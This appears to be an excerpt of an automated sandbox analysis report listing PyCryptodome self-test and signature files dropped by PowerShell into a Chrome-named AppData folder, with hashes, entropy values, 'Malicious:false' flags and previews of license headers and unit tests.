                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Signature\test_pss.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16188
                                                                                                                                                                                                  Entropy (8bit):5.334015326079158
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/ISmR/wgOLydIVOHScWJ8WuIWBExWaUYbIeDcYcOEtZ0RB2BZuOYc:0rskrs9Vq4/kbVUSdxpzcY6V5
                                                                                                                                                                                                  MD5:C3413892395D1B95715A94D5B15594F7
                                                                                                                                                                                                  SHA1:8D5566324873EB5BD0DF6DA4F43F4D23B443FDB0
                                                                                                                                                                                                  SHA-256:42CBEB606342C984B33629AA0C2D0FE9659A9518C8BB502E9AB7E23063DBE8FA
                                                                                                                                                                                                  SHA-512:5CC41F7ABDE76236C6CB3314DF824AC8947693A0273924D715771859CE0760A37553BC6554FE8B0B85DBA6F25516B024696E2DFBADFDDD0BB745F3DE855F45B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Util\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2043
                                                                                                                                                                                                  Entropy (8bit):5.237240672014205
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NkwEIB0jcQHMsvI/S3oCFl40lSifxGEgO9JJraZa:CwfFQHvojCv9JJrB
                                                                                                                                                                                                  MD5:EC15E489C4F3AF1D1987C5EA4FA2F3BC
                                                                                                                                                                                                  SHA1:02FC0FA5EC2BD850A5149C4ED28598A667D41E32
                                                                                                                                                                                                  SHA-256:83AE64E7E2A6D6A1E0CC643404157AD938D8A84EA9A7442F4210E10E9D5FD69E
                                                                                                                                                                                                  SHA-512:8989312A6F7A87A4D78D325C5836A9541A980477797E3C0133DCB1A2E66D2646FAADDBEAA7232BE44208A01031EB9EEF4DBA5F3A1E64D637C5D5A15957158EBC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/__init__.py: Self-test for utility modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Util\test_Counter.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2339
                                                                                                                                                                                                  Entropy (8bit):5.202413718317069
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NxF/TEIB0jcQHMsvI/S3oCFcr+QuD0XTFBWTMhaja:5bfFQHvopH60XJBW4hZ
                                                                                                                                                                                                  MD5:F8501D1710CC47279356124DDD4A9A49
                                                                                                                                                                                                  SHA1:197A10A96EE658F58A107AF631A114904E4A6EC6
                                                                                                                                                                                                  SHA-256:F4DFE661669A43868A44FBDC01A60DFDDED11FC5A770E8B2554152DEC251F2D3
                                                                                                                                                                                                  SHA-512:EE8ACC076B992FB3C4409B5F04E06FBC6AD284886837BDEDD802CABC6228AF450333F9ABE374BFEDD24DE9CDBFD04CA7C06A93B03DB5CC54AD2CF5DCB4371D5B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_Counter: Self-test for the Crypto.Util.Counter module..#..# Written in 2009 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..#

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Util\test_Padding.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5968
                                                                                                                                                                                                  Entropy (8bit):5.267773090086199
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RnQWOqrYJALrYJHdG43tDs3EsIG13NcuIHYtP+Q2+J+0V7x0x0xQ0y0w0i0+L0+2:aDqrYJALrYJHdt3EHGuI4pH2szilvr4
                                                                                                                                                                                                  MD5:045488719FC3B54CD805AFEA79086287
                                                                                                                                                                                                  SHA1:0079310849DE854819E7324DBEE7A9459F297BEE
                                                                                                                                                                                                  SHA-256:012373897A1401AA2BAFC1D4029E5C239355CBED106A163B57011AFDBC18C084
                                                                                                                                                                                                  SHA-512:7BCF2EAE6E754C947FB3A4418491DF4AD8C99771A3D2DB0F8FA1DD1736C4118059C5CCB3C0F1B26B301155EF1DAB4F606CC56C56263F1A1AA7C078061715AA5C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Util/test_Padding.py: Self-test for padding functions..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIME

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Util\test_asn1.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32107
                                                                                                                                                                                                  Entropy (8bit):4.8144423694550875
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Prskrs9VqIXAYJ+oGchbBZ2XmO2CQBL7plKRA0:Pr6qIXAQ+Q1BZ2XmO2CQBL7pl30
                                                                                                                                                                                                  MD5:29B2837A29B459F7AC7356C3E4AFEE8C
                                                                                                                                                                                                  SHA1:217FF3DBCBA7ACFCD46C51E29F7198C751767E49
                                                                                                                                                                                                  SHA-256:33EE3596C53755388DD219D425DE8F1D65F3CF64346ADFA51A2DE46846A5950B
                                                                                                                                                                                                  SHA-512:577671B265BCFB82A760F83DA006EE1FC6FDAD5ED34A8CB4FEF8D48E058697840E182121E93CEB9FD81A614A2E68B9011DF204B202FFE63F9125199A22B78423
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Util/test_asn.py: Self-test for the Crypto.Util.asn1 module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DIS

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Util\test_number.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (303), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8710
                                                                                                                                                                                                  Entropy (8bit):5.184554837708348
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:jwfFQHvoBNH2Pbvf6KWvf0RoWRfrrFSRfnb3bjVj/3pjq7PfcN1Ep3S0rZ:jwdQHvd7WvfhQrrFknb3Rpta/rZ
                                                                                                                                                                                                  MD5:8CFC6216203E8227001F370383E6DF55
                                                                                                                                                                                                  SHA1:6B104AAA274506FED8794ED9C2414D4FA94AA6C6
                                                                                                                                                                                                  SHA-256:948547B6DB811911AA4E75E5E336CED60A3BE1036D4FD6C5AC68FF86662981AF
                                                                                                                                                                                                  SHA-512:CB6A289B14960AA4CDED95E21AEF8B2C2997DD90F56D9CDC033D27AEA2818F6963880553BE13DE8B647163EFFB315AA4EC87F572BD311AA62CF72102BFCC5A63
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_number.py: Self-test for parts of the Crypto.Util.number module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT O

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Util\test_rfc1751.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1151
                                                                                                                                                                                                  Entropy (8bit):5.090285924912527
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:+1+715k8BZTiOYBHHkhzgtJpQyRXPLy1jgpajoP:+1+717Z+OkKc7QyRXTYOajy
                                                                                                                                                                                                  MD5:A0C63441A48C45F3417E90BD604DEBEE
                                                                                                                                                                                                  SHA1:7D80DD96977104ECE9AD12DAE596C289AB46947C
                                                                                                                                                                                                  SHA-256:4BAD1C6F40BB00F3551BCC1F1849E895178B15133E6DFCC0F10657FF1C5367A9
                                                                                                                                                                                                  SHA-512:80428786485D50A4915B3BE184B7BBB674B0BC277F1966591C0BD3D6366155F02F31ABD6972A7AC9ACFACCE9039801851340080872B51597F8E71553212727DB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest....import binascii..from Crypto.Util.RFC1751 import key_to_english, english_to_key......class RFC1751_Tests(unittest.TestCase):.... def test1(self):.. data = [.. ('EB33F77EE73D4053', 'TIDE ITCH SLOW REIN RULE MOT'),.. ('CCAC2AED591056BE4F90FD441C534766', 'RASH BUSH MILK LOOK BAD BRIM AVID GAFF BAIT ROT POD LOVE'),.. ('EFF81F9BFBC65350920CDD7416DE8009', 'TROD MUTE TAIL WARM CHAR KONG HAAG CITY BORE O TEAL AWL').. ].... for key_hex, words in data:.. key_bin = binascii.a2b_hex(key_hex).... w2 = key_to_english(key_bin).. self.assertEqual(w2, words).... k2 = english_to_key(words).. self.assertEqual(k2, key_bin).... def test_error_key_to_english(self):.... self.assertRaises(ValueError, key_to_english, b'0' * 7)......def get_tests(config={}):.. from Crypto.SelfTest.st_common import list_test_cases.. tests = list_test_cases(RFC1751_

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Util\test_strxor.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10495
                                                                                                                                                                                                  Entropy (8bit):5.073385582254096
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:0Vqrskrs9t3q/ILyOZMz75bdPmbMSGSrZ7llGLrOp:08rskrs9VqHOZMxjSrZJ
                                                                                                                                                                                                  MD5:FB3C8204F2C018E2825D45B12991A186
                                                                                                                                                                                                  SHA1:0BB3FEDFDC56F251526FF5DE20B2058BD1FDB3B1
                                                                                                                                                                                                  SHA-256:94A8D7005DAFC4F46C6DD73D758471E2E13CCAA4666D135C3F64DB04EC1E51D0
                                                                                                                                                                                                  SHA-512:5DF2907343C969CFB0D5BC28C4A5A5243BCB80F70E4DD482DFCF91AB10436235934329E49122B6A0788855F55683AE9F543750BA1D5E22D683A901BBAD31FD33
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Util/test_strxor.py: Self-test for XORing..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3311
                                                                                                                                                                                                  Entropy (8bit):5.046154186405365
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:newfFQHvov0c11HR8GqgxpSKgdkyKv2JeIPHkOS:newdQHv+V00+dkyKv24IcOS
                                                                                                                                                                                                  MD5:6006235799D8B51FA0D57D451012FBF9
                                                                                                                                                                                                  SHA1:5FF6022873D06D926211402F22235339F228ED24
                                                                                                                                                                                                  SHA-256:A5195DE8F0FD1855C9FE4170915BC36C9C9F85DF5B8E14FEAF817C570F9C25F1
                                                                                                                                                                                                  SHA-512:66EB48B147A76F1531746E13E699610C26CB8094833005223ACF0B7A74E548388AE94349A642EF2A40132076A1D8C8A74EE85997AD3BE8290B758A76A9E3FE06
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/__init__.py: Self-test for PyCrypto..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWAR

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\__main__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1612
                                                                                                                                                                                                  Entropy (8bit):5.252093420200057
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:SKKXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FGROi5hC3b7f5VNLjg/:SeIB0jcQHMsvI/S3oCFGROi+7nfc
                                                                                                                                                                                                  MD5:80548AD81CAB82847277B36A7FB78711
                                                                                                                                                                                                  SHA1:DF518CE7B812750B118835598A3E6278934D7F42
                                                                                                                                                                                                  SHA-256:165A0BA1E31BEC7C6E80633F113D3882CC2AC98E37F51E9224AAAE8B3DF93D67
                                                                                                                                                                                                  SHA-512:0357B12B490096A0564944310129D5EEBFAADDF5CDB3EB8465D36422AAB4AB606937FD1BB927C49904D7A43E12B9139D486D438D36B59FE06BF1145744AAA09A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#! /usr/bin/env python..#..# __main__.py : Stand-along loader for PyCryptodome test suite..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\loader.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8290
                                                                                                                                                                                                  Entropy (8bit):4.711704617154598
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:fqrskrs9t3q/IPgznMH/wpZJ3wGp6gM9KlnR10n3kp:yrskrs9VqwgD3pZJ3np6gMaj0nc
                                                                                                                                                                                                  MD5:1CEA7121AA769ADD798184C715B0A87B
                                                                                                                                                                                                  SHA1:38A493251DCCFD8FA4324DA3BC7512D2EF0A6CB4
                                                                                                                                                                                                  SHA-256:1D9542404A9119043588ADDF20B0A69AF6023CFD5072610207A93509A4E7E0EB
                                                                                                                                                                                                  SHA-512:29086E883A414DDA4642EA3EE6119CEA6F1EACAD114AFCEDCACB65071DEFF5034CD5AD22EB88E26F9A17045C20BCBEE26AA59883D6C33D916CCA129895B4BAD7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\st_common.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2000
                                                                                                                                                                                                  Entropy (8bit):5.225498157362526
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NrwEIB0jcQHMsvI/S3oCFgJ1+Ql+G8Aqbn0Quqoc9Df1UQ:JwfFQHvoj1HlOn0dqRDf1UQ
                                                                                                                                                                                                  MD5:B1A5A642E0F13E51AEE1AA096B819498
                                                                                                                                                                                                  SHA1:499EAA63461629F2883FBD1B40FFA32025CB64B4
                                                                                                                                                                                                  SHA-256:AA5EB6DDEE38BF49097C0AF6262C8B90CA0CD366AC0826DD8AAE37B63CD8B045
                                                                                                                                                                                                  SHA-512:452A98DABBD55A1EB3648CF02BA49430887609467920511907788505F9D5505C7F11EEBFF850D26722EC3F9E92B7BD14D37EA15505D09C68AD10825770D969C4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/st_common.py: Common functions for SelfTest modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\DSS.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15703
                                                                                                                                                                                                  Entropy (8bit):4.885505436795799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:frskrs9VqeLElh6OXUqNF/eqHb2G6kP09W7:fr6qLjFvTh
                                                                                                                                                                                                  MD5:D6E0624C129C7C3BC3CFF8A17611430E
                                                                                                                                                                                                  SHA1:30D96A4902E6D5F54667EE9E94C2BD4D3F2DD022
                                                                                                                                                                                                  SHA-256:EBED89F64095A8B493E850D5F976AD3E30991211C5EE53F47242B18DBC762490
                                                                                                                                                                                                  SHA-512:4BC303F11DB4301738C8A9E0E983C5C13AAC63F3B6E9CC597E1C2999B8EEE241E9CEE5C2B9DAA5D7DDAA6EFB468E58E7DA52110962B49A5C9D55DA53F6382B01
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# Signature/DSS.py : DSS.py..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\DSS.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1121
                                                                                                                                                                                                  Entropy (8bit):4.992804063334473
                                                                                                                                                                                                  Encrypted:false
